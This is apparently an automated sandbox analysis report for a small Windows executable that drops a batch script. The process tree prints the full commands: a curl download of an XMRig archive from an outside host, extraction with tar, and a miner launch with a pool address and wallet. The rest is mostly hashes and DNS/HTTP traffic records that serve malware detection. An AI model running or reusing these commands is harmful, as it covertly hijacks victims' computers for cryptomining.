4c911d7d2e043676fb0b4ff128bebd9206dae91049cbd1827c6edabded461baa

max time kernel
1495s
max time network
1497s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
11/03/2024, 21:08 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test - Copy (8).exe
Size

6KB
MD5

4634098fe194204dc03f967cc0b19cd6
SHA1

eaa58619c6cea9f148cec61ee504cd727b3e80d8
SHA256

a1070b8803e4243699a44a77e60a199282814495bc3bd94759c07021c0a6c70c
SHA512

64e97fac56a25daf99f8ee1a9f480acc8020d5da4eb96ea77022c9170f6300b7b5479fce86e3e7e088cdaabdf123b65872e09b0ae17f8f97ea2fe58b6ecf7a9d
SSDEEP

96:2Fb158Vgo4CVvAXklfZT8kYl9RxxgAVNb8ICcGKzNt:oMV1vAX+8kYDRxbLh4s

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3592	xmrig.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4020 wrote to memory of 4960	4020	test - Copy (8).exe	80
PID 4020 wrote to memory of 4960	4020	test - Copy (8).exe	80
PID 4960 wrote to memory of 4828	4960	cmd.exe	82
PID 4960 wrote to memory of 4828	4960	cmd.exe	82
PID 4960 wrote to memory of 3412	4960	cmd.exe	85
PID 4960 wrote to memory of 3412	4960	cmd.exe	85
PID 4960 wrote to memory of 3592	4960	cmd.exe	86
PID 4960 wrote to memory of 3592	4960	cmd.exe	86

C:\Users\Admin\AppData\Local\Temp\test - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\test - Copy (8).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CjxAp6eM.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\system32\curl.exe
    curl -o "C:\xmrig\xmrig-6.21.1-gcc-win64.zip" https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
    3⤵
    PID:4828
- - C:\Windows\system32\tar.exe
    tar -xf "C:\xmrig\xmrig-6.21.1-gcc-win64.zip"
    3⤵
    PID:3412
- - C:\xmrig\xmrig-6.21.1\xmrig.exe
    C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.RIG -p x --cpu-affinity=5 --cpu-no-yield
    3⤵
    - Executes dropped EXE
    PID:3592

Network

DNS

1488.netlify.app

curl.exe

Remote address:

8.8.8.8:53

Request

1488.netlify.app

IN A

Response

1488.netlify.app

IN A

52.58.254.253

1488.netlify.app

IN A

3.72.140.173
DNS

ctldl.windowsupdate.com

curl.exe

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

wu-bg-shim.trafficmanager.net

wu-bg-shim.trafficmanager.net

IN CNAME

download.windowsupdate.com.edgesuite.net

download.windowsupdate.com.edgesuite.net

IN CNAME

a767.dspw65.akamai.net

a767.dspw65.akamai.net

IN A

96.17.178.210

a767.dspw65.akamai.net

IN A

96.17.178.201

a767.dspw65.akamai.net

IN A

96.17.178.193
DNS

ocsp.digicert.com

curl.exe

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
DNS

253.254.58.52.in-addr.arpa

curl.exe

Remote address:

8.8.8.8:53

Request

253.254.58.52.in-addr.arpa

IN PTR

Response

253.254.58.52.in-addr.arpa

IN PTR

ec2-52-58-254-253eu-central-1compute amazonawscom
DNS

253.254.58.52.in-addr.arpa

curl.exe

Remote address:

8.8.8.8:53

Request

253.254.58.52.in-addr.arpa

IN PTR
GET

https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip

curl.exe

Remote address:

52.58.254.253:443

Request

GET /xmrig-6.21.1-gcc-win64.zip HTTP/1.1
Host: 1488.netlify.app
User-Agent: curl/7.79.1
Accept: */*

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 0
Cache-Control: public,max-age=0,must-revalidate
Cache-Status: "Netlify Edge"; fwd=miss
Content-Length: 3336525
Content-Type: application/zip
Date: Sat, 16 Mar 2024 14:57:15 GMT
Etag: "3f561091cdba4bace650b26717533c91-ssl"
Server: Netlify
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Nf-Request-Id: 01HS3W8QAFJZMXKNEWNPDS3HCQ
DNS

210.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.178.17.96.in-addr.arpa

IN PTR

Response

210.178.17.96.in-addr.arpa

IN PTR

a96-17-178-210deploystaticakamaitechnologiescom
DNS

210.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.178.17.96.in-addr.arpa

IN PTR
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

ctldl.windowsupdate.com

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

wu-bg-shim.trafficmanager.net

wu-bg-shim.trafficmanager.net

IN CNAME

download.windowsupdate.com.edgesuite.net

download.windowsupdate.com.edgesuite.net

IN CNAME

a767.dspw65.akamai.net

a767.dspw65.akamai.net

IN A

96.17.178.190

a767.dspw65.akamai.net

IN A

96.17.178.175

a767.dspw65.akamai.net

IN A

96.17.178.178

a767.dspw65.akamai.net

IN A

96.17.178.187

a767.dspw65.akamai.net

IN A

96.17.178.185

a767.dspw65.akamai.net

IN A

96.17.178.182

a767.dspw65.akamai.net

IN A

96.17.178.180

a767.dspw65.akamai.net

IN A

96.17.178.177

a767.dspw65.akamai.net

IN A

96.17.178.191
DNS

190.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.178.17.96.in-addr.arpa

IN PTR

Response

190.178.17.96.in-addr.arpa

IN PTR

a96-17-178-190deploystaticakamaitechnologiescom
DNS

nexusrules.officeapps.live.com

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A

Response

nexusrules.officeapps.live.com

IN CNAME

prod.nexusrules.live.com.akadns.net

prod.nexusrules.live.com.akadns.net

IN A

52.111.227.14
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

self.events.data.microsoft.com

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdwus15.westus.cloudapp.azure.com

onedscolprdwus15.westus.cloudapp.azure.com

IN A

20.189.173.18
DNS

18.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.173.189.20.in-addr.arpa

IN PTR

Response
DNS

login.live.com

Remote address:

8.8.8.8:53

Request

login.live.com

IN A

Response

login.live.com

IN CNAME

login.msa.msidentity.com

login.msa.msidentity.com

IN CNAME

www.tm.lg.prod.aadmsa.akadns.net

www.tm.lg.prod.aadmsa.akadns.net

IN CNAME

prdv4a.aadg.msidentity.com

prdv4a.aadg.msidentity.com

IN CNAME

www.tm.v4.a.prd.aadg.trafficmanager.net

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.31.73

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.159.73

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.31.67

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.159.68

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.159.75

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.159.23

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.159.0

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.159.4
DNS

login.live.com

Remote address:

8.8.8.8:53

Request

login.live.com

IN A
DNS

73.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.31.126.40.in-addr.arpa

IN PTR

Response
DNS

arc.msn.com

Remote address:

8.8.8.8:53

Request

arc.msn.com

IN A

Response

arc.msn.com

IN CNAME

arc.trafficmanager.net

arc.trafficmanager.net

IN CNAME

iris-de-prod-azsc-v2-frc.francecentral.cloudapp.azure.com

iris-de-prod-azsc-v2-frc.francecentral.cloudapp.azure.com

IN A

20.199.58.43
DNS

arc.msn.com

Remote address:

8.8.8.8:53

Request

arc.msn.com

IN A
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

arc.msn.com

Remote address:

8.8.8.8:53

Request

arc.msn.com

IN A

Response

arc.msn.com

IN CNAME

arc.trafficmanager.net

arc.trafficmanager.net

IN CNAME

iris-de-prod-azsc-v2-frc-b.francecentral.cloudapp.azure.com

iris-de-prod-azsc-v2-frc-b.francecentral.cloudapp.azure.com

IN A

20.74.47.205
DNS

ris.api.iris.microsoft.com

Remote address:

8.8.8.8:53

Request

ris.api.iris.microsoft.com

IN A

Response

ris.api.iris.microsoft.com

IN CNAME

ris-prod.trafficmanager.net

ris-prod.trafficmanager.net

IN CNAME

asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com

asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com

IN A

20.234.120.54
DNS

ris.api.iris.microsoft.com

Remote address:

8.8.8.8:53

Request

ris.api.iris.microsoft.com

IN A
DNS

ris.api.iris.microsoft.com

Remote address:

8.8.8.8:53

Request

ris.api.iris.microsoft.com

IN A
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301539_1LZD8B6H2LG4UBZ4R&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301539_1LZD8B6H2LG4UBZ4R&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 332738
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 17015F15FB5E4D13B4AE75449449170B Ref B: LON04EDGE1018 Ref C: 2024-03-16T15:21:07Z
date: Sat, 16 Mar 2024 15:21:06 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418541_1R6VGP5QQCA6F4RQL&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418541_1R6VGP5QQCA6F4RQL&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 220384
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 70C70F4CD8304E4F8F52BA4E2291FA63 Ref B: LON04EDGE1018 Ref C: 2024-03-16T15:21:07Z
date: Sat, 16 Mar 2024 15:21:06 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301106_1JD1TT7SP468FJOZF&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301106_1JD1TT7SP468FJOZF&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 161706
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 25DCE4E3B49647F59D9EB2055DD81F28 Ref B: LON04EDGE1018 Ref C: 2024-03-16T15:21:07Z
date: Sat, 16 Mar 2024 15:21:06 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388229_1X5TLMI7W26L9HRSX&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339388229_1X5TLMI7W26L9HRSX&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 106902
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4D02386D7E8049399BEF623ED7B3352D Ref B: LON04EDGE1018 Ref C: 2024-03-16T15:21:07Z
date: Sat, 16 Mar 2024 15:21:06 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388228_1PR537X02WDD7KMIN&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339388228_1PR537X02WDD7KMIN&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 96407
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8F7F700A230B4E84B4CFD093E1769C31 Ref B: LON04EDGE1018 Ref C: 2024-03-16T15:21:07Z
date: Sat, 16 Mar 2024 15:21:06 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418542_1M27CNBNVY6AXHL84&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418542_1M27CNBNVY6AXHL84&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 325071
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 545BDAB064274E7EA79492021E0AFA2D Ref B: LON04EDGE1018 Ref C: 2024-03-16T15:21:08Z
date: Sat, 16 Mar 2024 15:21:07 GMT
DNS

54.120.234.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.120.234.20.in-addr.arpa

IN PTR

Response
DNS

ris.api.iris.microsoft.com

Remote address:

8.8.8.8:53

Request

ris.api.iris.microsoft.com

IN A

Response

ris.api.iris.microsoft.com

IN CNAME

ris-prod.trafficmanager.net

ris-prod.trafficmanager.net

IN CNAME

asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com

asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com

IN A

20.234.120.54
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

arc.msn.com

Remote address:

8.8.8.8:53

Request

arc.msn.com

IN A

Response

arc.msn.com

IN CNAME

arc.trafficmanager.net

arc.trafficmanager.net

IN CNAME

iris-de-prod-azsc-v2-weu.westeurope.cloudapp.azure.com

iris-de-prod-azsc-v2-weu.westeurope.cloudapp.azure.com

IN A

20.103.156.88
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response

52.58.254.253:443

https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip

tls, http

curl.exe

60.6kB
2.3MB
1242
1801

HTTP Request

GET https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip

HTTP Response

200
127.0.0.1:49745

curl.exe
52.111.229.43:443

322 B
7
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
8.1kB
16
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239340418542_1M27CNBNVY6AXHL84&pid=21.2&w=1920&h=1080&c=4

tls, http2

46.4kB
1.3MB
964
959

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301539_1LZD8B6H2LG4UBZ4R&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418541_1R6VGP5QQCA6F4RQL&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301106_1JD1TT7SP468FJOZF&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388229_1X5TLMI7W26L9HRSX&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388228_1PR537X02WDD7KMIN&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418542_1M27CNBNVY6AXHL84&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
8.1kB
16
13
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
8.1kB
16
14

8.8.8.8:53

1488.netlify.app

dns

curl.exe

338 B
644 B
5
4

DNS Request

1488.netlify.app

DNS Response

52.58.254.253

3.72.140.173

DNS Request

ctldl.windowsupdate.com

DNS Response

96.17.178.210

96.17.178.201

96.17.178.193

DNS Request

ocsp.digicert.com

DNS Response

192.229.221.95

DNS Request

253.254.58.52.in-addr.arpa

DNS Request

253.254.58.52.in-addr.arpa
8.8.8.8:53

210.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

210.178.17.96.in-addr.arpa

DNS Request

210.178.17.96.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

630 B
1.6kB
9
8

DNS Request

95.221.229.192.in-addr.arpa

DNS Request

ctldl.windowsupdate.com

DNS Response

96.17.178.190

96.17.178.175

96.17.178.178

96.17.178.187

96.17.178.185

96.17.178.182

96.17.178.180

96.17.178.177

96.17.178.191

DNS Request

190.178.17.96.in-addr.arpa

DNS Request

nexusrules.officeapps.live.com

DNS Response

52.111.227.14

DNS Request

14.227.111.52.in-addr.arpa

DNS Request

self.events.data.microsoft.com

DNS Response

20.189.173.18

DNS Request

18.173.189.20.in-addr.arpa

DNS Request

login.live.com

DNS Request

login.live.com

DNS Response

40.126.31.73

20.190.159.73

40.126.31.67

20.190.159.68

20.190.159.75

20.190.159.23

20.190.159.0

20.190.159.4
8.8.8.8:53

73.31.126.40.in-addr.arpa

dns

185 B
334 B
3
2

DNS Request

73.31.126.40.in-addr.arpa

DNS Request

arc.msn.com

DNS Request

arc.msn.com

DNS Response

20.199.58.43
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

344 B
528 B
5
3

DNS Request

43.58.199.20.in-addr.arpa

DNS Request

arc.msn.com

DNS Response

20.74.47.205

DNS Request

ris.api.iris.microsoft.com

DNS Request

ris.api.iris.microsoft.com

DNS Request

ris.api.iris.microsoft.com

DNS Response

20.234.120.54
8.8.8.8:53

tse1.mm.bing.net

dns

124 B
173 B
2
1

DNS Request

tse1.mm.bing.net

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

142 B
157 B
2
1

DNS Request

205.47.74.20.in-addr.arpa

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

202 B
438 B
3
3

DNS Request

200.197.79.204.in-addr.arpa

DNS Request

arc.msn.com

DNS Response

20.103.156.88

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

54.120.234.20.in-addr.arpa

dns

144 B
350 B
2
2

DNS Request

54.120.234.20.in-addr.arpa

DNS Request

ris.api.iris.microsoft.com

DNS Response

20.234.120.54

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CjxAp6eM.bat

Filesize
421B

MD5
67d11b392feb0ad59fc11ff3e79dfeee

SHA1
7df5785988cb76c4893773614572c93baaa18717

SHA256
69bcf6c4c959410d5857ac219600cec68035bd92e708c0bf7318eece8d5acb9d

SHA512
50835d7dccb22cbf052a64ce2dd50df97f726b1d2044ab0e55ba42a2874601b6fe064f84659f89ce079627d147cf49d9548b24b2160a17783b934c6793507f11

Download Submit
C:\xmrig\xmrig-6.21.1-gcc-win64.zip

Filesize
2.1MB

MD5
9003b4e97333e434993750a5a1ffd51c

SHA1
be11f5fc5d7fe68126caa0dcf82eab2c79564f3f

SHA256
b608f87abb9203f779c354e20eeafb4bcb13370dd176d6f120fbf86516aa6c9a

SHA512
1296f173e4c54163db7d145e4be8a76d5bbc019faef1a8c7586bf12845d15ce38924e1787db31f5a0d47c30b69aa8a7912eaaaab1ce5a04c19119c7b443b2546

Download Submit
C:\xmrig\xmrig-6.21.1\xmrig.exe

Filesize
7.9MB

MD5
43b3428e14dbe6c00070206093d5d351

SHA1
22396a69538c023f4034e50ede8cda36b6ada866

SHA256
8a0691f0a2ec3cf31349dc2c9556030094a445f034c857889a8b2d2541f878b4

SHA512
94e24e9e9a895be8a33f0f73d886942bec7aee9666bfbba0b20d00c213cdd80a0b5ba70b13b782d0deebbc0268c478253c9dc545cfcde2b18a455bea0ad8a19f

Download Submit
memory/4020-0-0x0000000000FD0000-0x0000000000FD8000-memory.dmp

Filesize
32KB

Download
memory/4020-5-0x00007FFCD2E10000-0x00007FFCD38D2000-memory.dmp

Filesize
10.8MB

Download
memory/4020-7-0x00007FFCD2E10000-0x00007FFCD38D2000-memory.dmp

Filesize
10.8MB

Download
memory/4020-23-0x00007FFCD2E10000-0x00007FFCD38D2000-memory.dmp

Filesize
10.8MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.